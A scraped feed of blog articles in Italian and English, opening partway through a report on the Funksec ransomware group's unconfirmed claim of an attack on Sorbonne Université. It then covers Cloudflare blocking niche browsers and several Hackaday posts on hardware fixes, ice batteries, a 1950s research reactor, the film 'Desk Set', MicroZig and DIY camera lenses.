• La descrizione dell’attacco: Funksec affermerebbe di possedere informazioni confidenziali, comprese credenziali e documenti strategici. Tuttavia, non vi sono prove concrete a supporto di questa dichiarazione.
• La tecnica di intimidazione: il testo presente nel DLS suggerirebbe alle vittime di cercare il proprio nome nei dati compromessi, una tattica psicologica utilizzata per amplificare l’ansia e aumentare la pressione su studenti, docenti e personale.
• L’identità del gruppo: il marchio “© 2025 Funksec ransomware” mostra l’intento del gruppo di consolidare la propria reputazione nel panorama del cybercrime. La loro strategia sembrerebbe mirata a costruire un’identità riconoscibile, simile a quella di gruppi più noti come LockBit o BlackCat.

Chi è Funksec? Un gruppo ransomware emergente

Funksec è un gruppo ransomware emerso pubblicamente alla fine del 2024, guadagnando rapidamente notorietà grazie ad attacchi mirati contro istituzioni governative e accademiche. I suoi membri si dichiarano autodidatti e sembrerebbero collaborare con altri gruppi di cybercriminali per affinare tecniche e strumenti offensivi. Molti attori dietro FunkSec sembrano inesperti, e parte delle informazioni pubblicate potrebbero essere riciclate da precedenti fughe di dati legate ad attività hacktiviste, sollevando dubbi sulla loro autenticità.

Un aspetto chiave dell’attività di FunkSec è la sua forte presenza su Breached Forum, una delle principali piattaforme di discussione del cybercrimine. Il gruppo ha sfruttato il forum per promuovere le proprie operazioni, condividere fughe di dati e guadagnare notorietà.

Uno dei membri più attivi su Breached Forum è Scorpion, noto anche come DesertStorm, che ha promosso FunkSec tramite un video su YouTube nell’ottobre 2024, sebbene il contenuto fosse più propagandistico che una reale dimostrazione delle capacità del gruppo. DesertStorm ha continuato a pubblicare presunte fughe di dati su Breached Forum fino a quando il suo account non è stato bannato nel novembre 2024. Dopo la sua esclusione, un altro attore, El Farado, ha assunto un ruolo chiave nella promozione del gruppo, condividendo fughe di dati e mantenendo alta la visibilità di FunkSec sul forum.

Le discussioni su Breached Forum indicano che FunkSec utilizza una combinazione di tattiche di hacktivismo e cybercrimine. Alcuni membri del gruppo sembrano avere trascorsi in ambienti hacktivisti, mentre altri sono più orientati al guadagno economico. Il loro ransomware, scritto in Rust e con sviluppo in continua evoluzione, è stato promosso direttamente su Breached Forum con aggiornamenti frequenti sulle nuove funzionalità. Inoltre, FunkSec ha pubblicato richieste di collaborazione e servizi aggiuntivi, tra cui un presunto sistema di “data sorting” gestito da un membro noto come XTN.

Alcune fughe di FunkSec sono state pubblicate su DarkForums da un utente con il nome Bjorka, un noto hacktivista indonesiano. Tuttavia, non ci sono prove definitive che il vero Bjorka sia coinvolto con FunkSec, e potrebbe trattarsi di un tentativo di sfruttare la sua notorietà.

L’analisi del loro ransomware suggerisce che il codice sia stato sviluppato con l’assistenza dell’intelligenza artificiale, consentendo al gruppo di iterare rapidamente le versioni nonostante la scarsa esperienza tecnica dei suoi membri. Questo solleva interrogativi sulla reale minaccia rappresentata da FunkSec e sulla difficoltà di distinguere tra hacktivismo e cybercrimine nell’ecosistema ransomware attuale.

Il gruppo opererebbe secondo il modello della doppia estorsione: non solo cifrerebbe i dati delle vittime, ma ne esfiltrerebbe una copia per minacciarne la pubblicazione in caso di mancato pagamento del riscatto. Questo approccio rende la strategia difensiva più complessa, poiché il semplice ripristino dei sistemi dai backup non sarebbe sufficiente per mitigare il danno reputazionale e legale derivante dalla diffusione delle informazioni rubate.

FunkSec sostiene di integrare l’intelligenza artificiale nel 30% dei propri processi operativi, sebbene non vi siano prove indipendenti a supporto di questa affermazione. Secondo quanto dichiarato, l’IA verrebbe utilizzata per:

• Automatizzare attacchi di phishing altamente mirati
• Creare strumenti personalizzati per lo sfruttamento delle vulnerabilità
• Analizzare e prioritizzare le potenziali vittime con maggiore efficienza

L’IA nel cybercrime: una nuova frontiera per il ransomware?

L’utilizzo dell’intelligenza artificiale nel cybercrime non è una novità assoluta, ma la crescente sofisticazione di questi strumenti sta alimentando una nuova ondata di minacce. Se le affermazioni di Funksec fossero confermate, saremmo di fronte a un gruppo che sfrutta strumenti avanzati per automatizzare operazioni complesse, riducendo la necessità di competenze manuali e aumentando l’efficacia degli attacchi.

Le applicazioni dell’IA nel cybercrime potrebbero includere:

• La generazione di campagne di phishing più realistiche
• L’identificazione di vulnerabilità con tecniche predittive
• Lo sviluppo di malware capaci di eludere i sistemi di sicurezza tradizionali

Nonostante ciò, la maggior parte dei ransomware oggi in circolazione continua a basarsi su tecniche consolidate, come lo sfruttamento di credenziali compromesse o l’abuso di vulnerabilità non patchate. L’intelligenza artificiale potrebbe accelerare questi processi, ma al momento non ha ancora rivoluzionato il panorama delle minacce.

Conclusioni

Al momento, la presunta violazione rivendicata dal gruppo Funksec Ransomware rimane non confermata da fonti istituzionali. Tuttavia, la potenziale gravità della questione — vista la natura strategica dei dati che sarebbero stati sottratti — richiede un’attenta valutazione dei rischi e delle contromisure da parte delle autorità competenti.

RHC continuerà a monitorare la situazione e pubblicherà eventuali ulteriori aggiornamenti qualora emergessero informazioni significative. Invitiamo chiunque sia a conoscenza di dettagli rilevanti a contattarci attraverso la mail crittografata del whistleblower, garantendo la possibilità di rimanere anonimi.

L'articolo Sorbonne Université nel mirino di Funksec: il gruppo ransomware rivendica un attacco proviene da il blog della sicurezza informatica.

SD cards & the much smaller microSD cards are found on many devices, with the card often accessible from outside the enclosure. Unfortunately there’s a solid chance that especially small microSD cards will find their way past the microSD card reader slot and into the enclosure. This is what happened to [Rob] of the SevenFortyOne Radios and Repairs channel on YouTube with a NanoVNA unit. While shaking the unit, you can clearly hear the microSD card rattling inside, courtesy of the rather large gap above the card slot.

After a quick teardown and extracting the lost microSD card, the solution to prevent this is a simple bit of foam stuck on top of the microSD card slot, so that the too large opening in the enclosure is now fully blocked. It’s clearly a bit of a design fail in this particular NanoVNA unit, worsened by the tiny size of the card and having to use a fingernail to push the card into the slot as it’s so far inside the enclosure.

While [Rob] seems to blame himself for this event, we’d chalk it mostly up to poor design. It’s an issue that’s seen with certain SBC enclosures and various gadgets too, where losing a microSD card is pretty much a matter of time, and hugely fiddly at the best of times. That said, what is your preferred way of handling microSD card insertion & removal in devices like these?

youtube.com/embed/4-mij2XYdUQ?…

hackaday.com/2025/03/09/fixing…

Imagine cooling your building with the same principle that kept Victorian-era icehouses stocked with lake-frozen blocks, but in modern form. That’s the idea behind ice batteries, a clever energy storage hack that’s been quietly slashing cooling costs across commercial buildings. The invention works by freezing water when energy is cheap, and using that stored cold later, they turn major power hogs (air conditioning, we’re looking at you) into more efficient, cost-effective systems.

Pioneers like Nostromo Energy and Ice Energy are refining the tech. Nostromo’s IceBrick modules pack 25 kWh of cooling capacity each, install on rooftops, and cost around $250 per kWh—about half the price of lithium-ion storage. Ice Energy’s Ice Bear 40 integrates with HVAC systems, shifting up to 95% of peak cooling demand to off-peak hours. And for homes, the Ice Bear 20 replaces traditional AC units while doubling as a thermal battery.

Unlike lithium-ion, ice batteries don’t degrade chemically – their water is endlessly reusable. Combining the technology with this hack, it’s even possible in environments where water is scarce. But the trade-off? They only store cooling energy. No frozen kilowatts for your lightbulbs, just an efficient way to handle the biggest energy drain in most buildings.

Could ice batteries help decentralize energy storage? They’re already proving their worth in high-demand areas like California and Texas. Read the full report here and let us know your thoughts in the comments.

Original photo by Kelly Sikkema on Unsplash

hackaday.com/2025/03/09/the-co…

Gli utenti di alcuni browser meno diffusi lamentano problemi di accesso a vari siti dovuti al funzionamento dei sistemi Cloudflare. I giornalisti del The Register riferiscono che la loro attenzione su questo problema è stata attirata dagli utenti, dagli specialisti della sicurezza informatica e dagli sviluppatori del browser open source Pale Moon.

Sembra che gli utenti si lamentino regolarmente della mancata disponibilità del sito web relativo al forum di Cloudflare, ma l’azienda non sembra prestarvi attenzione. Ad esempio, i ricercatori hanno trovato segnalazioni di problemi relativi a Cloudflare e al blocco di siti web risalenti al 2015 , al 2022 , a marzo e luglio 2024 e a gennaio 2025.

I problemi sorgono perché Cloudflare mira a combattere le botnet e gli attacchi DDoS rilevando e bloccando qualsiasi attività sospetta. Ad esempio, dispositivi infetti che fanno parte di botnet ed eseguono determinati script. Un modo per rilevarli è controllare l’agente del browser e, se non proviene da un browser noto, bloccarlo.

Purtroppo l’elenco dei browser accettabili è limitato e include solo le ultime versioni di browser noti come Chrome (e i suoi numerosi derivati) e Firefox. Di norma, gli utenti delle ultime versioni dei browser Pale Moon, Falkon e SeaMonkey riscontrano problemi di blocco.

Le ultime note di rilascio di Pale Moon indicano che gli sviluppatori stanno cercando di risolvere questo problema, che spesso provoca il blocco del browser, la mancata risposta alle richieste o l’arresto anomalo del sistema. Anche alcuni utenti di Firefox 115 ESR (l’ultima versione per macOS 10.13 e Windows 7) riscontrano problemi di blocco. Tra i siti frequentemente interessati dal problema ci sono science.org, steamdb.info, convertapi.com e persino community.cloudflare.com.

Allo stesso tempo, secondo alcuni partecipanti alla discussione del problema su Hacker News, Cloudflare potrebbe considerare un’attività sospetta non solo l’utilizzo di browser o sistemi operativi di nicchia, ma anche una richiesta di un URL senza specificare un ID di riferimento. Mentre un utente prudente può bloccare il tracciamento, per il provider CDN tale attività è un segnale che le azioni non sono eseguite da un essere umano.

I giornalisti sottolineano che il supporto tecnico di Cloudflare è principalmente incentrato sui clienti aziendali e che gli utenti comuni possono solo lamentarsi di ciò che accade sui forum della community. Tuttavia, a giudicare dal numero di messaggi riguardanti il ​​blocco, l’azienda non monitora i forum per segnalazioni di problemi.

L'articolo Game Over: Cloudflare e il caos sui browser meno diffusi! proviene da il blog della sicurezza informatica.

The late 1950s were such an optimistic time in America. World War II had been over for less than a decade, the economy boomed thanks to pent-up demand after years of privation, and everyone was having babies — so many babies. The sky was the limit, especially with new technologies that promised a future filled with miracles, including abundant nuclear power that would be “too cheap to meter.”

It didn’t quite turn out that way, of course, but the whole “Atoms for Peace” thing did provide the foundation for a lot of innovations that we still benefit from to this day. This 1958 film on “The Armour Research Reactor” details the construction and operation of the world’s first privately owned research reactor. Built at the Illinois Institute of Technology by Atomics International, the reactor was a 50,000-watt aqueous-homogenous design using a solution of uranyl sulfate in distilled water as its fuel. The core is tiny, about a foot in diameter, and assembled by hand right in front of the camera. The stainless steel sphere is filled with 90 feet (27 meters) of stainless tubing to circulate cooling water through the core. Machined graphite reflector blocks surrounded the core and its fuel overflow tank (!) before the reactor was installed in “biological shielding” made from super-dense iron ore concrete with walls 5 feet (1.5 m) thick — just a few of the many advanced safety precautions taken “to ensure completely safe operation in densely populated areas.”

While the reactor design is interesting enough, the control panels and instrumentation are what really caught our eye. The Fallout vibe is strong, including the fact that the controls are all right in the room with the reactor. This allows technicians equipped with their Cutie Pie meters to insert samples into irradiation tubes, some of which penetrate directly into the heart of the core, where neutron flux is highest. Experiments included the creation of radioactive organic compounds for polymer research, radiation hardening of those new-fangled transistors, and manufacturing radionuclides for the diagnosis and treatment of diseases.

This mid-century technological gem might look a little sketchy to modern eyes, but the Armour Research Reactor had a long career. It was in operation until 1967 and decommissioned in 1972, and similar reactors were installed in universities and private facilities all over the world. Most of them are gone now, though, with only five aqueous-homogenous reactors left operating today.

youtube.com/embed/2Y3JsQ3evcM?…

hackaday.com/2025/03/08/retrot…

Movies mirror the time they were made. [ErnieTech] asserts that we can see what people thought about computers back in 1957 by watching the classic Spencer Tracy/Katharine Hepburn movie “Desk Set.” What’s more, he thinks this might be the first movie appearance of a human-like computer. On a side note, in the UK this movie was known as “The Other Woman.”

The story is about an MIT computer expert computerizing a broadcasting company who, of course, finds romance and, at least towards the end, comedy.

Of course, we are interested in the computer. It was supposedly an IBM machine and while IBM apparently provided some equipment (probably typewriters and tape drives), the computer is clearly just a ton of light bulbs. It was named Emmie, which was a nickname for EMERAC. Oddly enough, it was about like a modern web search engine or chatbot, answering random research questions. The difference is they had fed all the world’s knowledge into it themselves using punched cards.

The video has spoilers, but for a movie made in 1957, that’s not really an issue. The ending is pretty predictable, anyway. Like many people in 1957, there was a fear that “computers were going to take all our jobs!” [Ernie] makes the point that this was a common trope where the computer would run the Enterprise company and then made a big mistake, and everyone realized we still needed humans. EMERAC later guest-starred in the movie “The Fly.” It was just a background player in the chorus, though.

He also points out that many of the things people thought about the widespread adoption of computers are still true today if you replace computer with AI. Turns out, you still need to know how to reset the system.

[Ernie] did a video about Colossus last month, a topic we also visited last year. One of our favorite fictional computers, though, was more recent from “The Three Body Problem.”

youtube.com/embed/ckrUWOnlwkA?…

hackaday.com/2025/03/08/fictio…

Although most people would use C, C++ or MicroPython for programming microcontrollers, there are a few more obscure options out there as well, with MicroZig being one of them. Recently [Andrew Conlin] wrote about how to use MicroZig with the Raspberry Pi RP2040 MCU, showing the process of writing an SSD1306 OLED display driver and running it. Although MicroZig has since published a built-in version, the blog post gives a good impression of what developing with MicroZig is like.

Zig is a programming language which seeks to improve on the C language, adding memory safety, safe pointers (via option types), while keeping as much as possible of what makes C so useful for low-level development intact. The MicroZig project customizes Zig for use in embedded projects, targeting platforms including the Raspberry Pi MCUs and STM32. During [Andrew]’s usage of MicroZig it was less the language or supplied tooling that tripped him up, and more just the convoluted initialization of the SSD1306 controller, which is probably a good sign. The resulting project code can be found on his GitHub page.

hackaday.com/2025/03/08/writin…

If you’re a photography enthusiast, you probably own quite a few cameras, but the chances are your “good” one will have interchangeable lenses. Once you’ve exhausted the possibilities of the kit lens, you can try different focal lengths and effects, but you’ll soon find out that good glass isn’t cheap. Can you solve this problem by making your own lenses? [Billt] has done just that.

Given some CAD skills, it’s possible to replicate the mount on an existing lens, but he takes a shortcut by using a readily available camera cap project. There are two lenses detailed in the video below the break; the first is a plastic lens from a disposable camera, while the second takes one from a Holga toy camera. The plastic lens is inserted mid-print, giving the colour aberrations and soft focus you’d expect, while the Holga lens is mounted on a slide for focusing. There may be some room for improvement there, but the result is a pair of fun lenses for experimentation for not much outlay. Given the number of broken older cameras out there, it should be relatively easy for anyone wanting to try this for themselves to have a go.

The video is below the break, but while you’re on this path, take a look at a previous project using disposable camera lenses. Or, consider printing an entire camera.

youtube.com/embed/S5-6ZxoWP7Q?…

hackaday.com/2025/03/08/expens…